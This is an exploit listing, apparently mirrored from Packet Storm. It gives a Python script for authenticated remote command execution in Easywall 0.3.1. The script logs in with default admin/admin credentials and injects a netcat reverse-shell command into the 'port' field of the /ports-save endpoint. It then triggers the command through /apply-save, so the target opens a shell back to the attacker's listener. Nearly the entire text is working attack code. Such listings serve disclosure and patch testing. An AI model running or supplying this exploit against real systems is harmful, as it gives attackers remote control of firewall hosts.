Share
## https://sploitus.com/exploit?id=PACKETSTORM:177403
# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution  
# Date: 30-11-2023  
# Exploit Author: Melvin Mejia  
# Vendor Homepage: https://jpylypiw.github.io/easywall/  
# Software Link: https://github.com/jpylypiw/easywall  
# Version: 0.3.1  
# Tested on: Ubuntu 22.04  
  
import requests, json, urllib3  
urllib3.disable_warnings()  
  
def exploit():  
  
# Replace values needed here  
target_host = "192.168.1.25"  
target_port= "12227"  
lhost = "192.168.1.10"  
lport = "9001"  
user = "admin"  
password = "admin"  
  
target = f"https://{target_host}:{target_port}"  
  
# Authenticate to the app  
print("[+] Attempting login with the provided credentials...")  
login_data = {"username":user, "password":password}  
session = requests.session()  
try:  
login = session.post(f'{target}/login',data=login_data,verify=False)  
except Exception as ex:  
print("[!] There was a problem connecting to the app, error:", ex)  
exit(1)  
  
if login.status_code != 200:  
print("[!] Login failed.")  
exit(1)  
else:  
print("[+] Login successfull.")   
  
# Send the payload, the port parameter suffers from a command injection vulnerability  
print("[+] Attempting to send payload.")  
rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'  
data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}  
send_payload = session.post(f"{target}/ports-save",data=data,verify=False)  
if send_payload.status_code != 200:  
print("[!] Failed to send payload.")  
exit(1)  
else:  
print("[+] Payload sent.")  
  
# Trigger the execution of the payload  
print("[+] Attempting execution.")  
data = {"step_1":"", "step_2":""}  
execute = session.post(f"{target}/apply-save",data=data, verify=False)  
if execute.status_code != 200:  
print("[!] Attempt to execute failed.")  
exit(1)  
else:  
print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")  
  
exploit()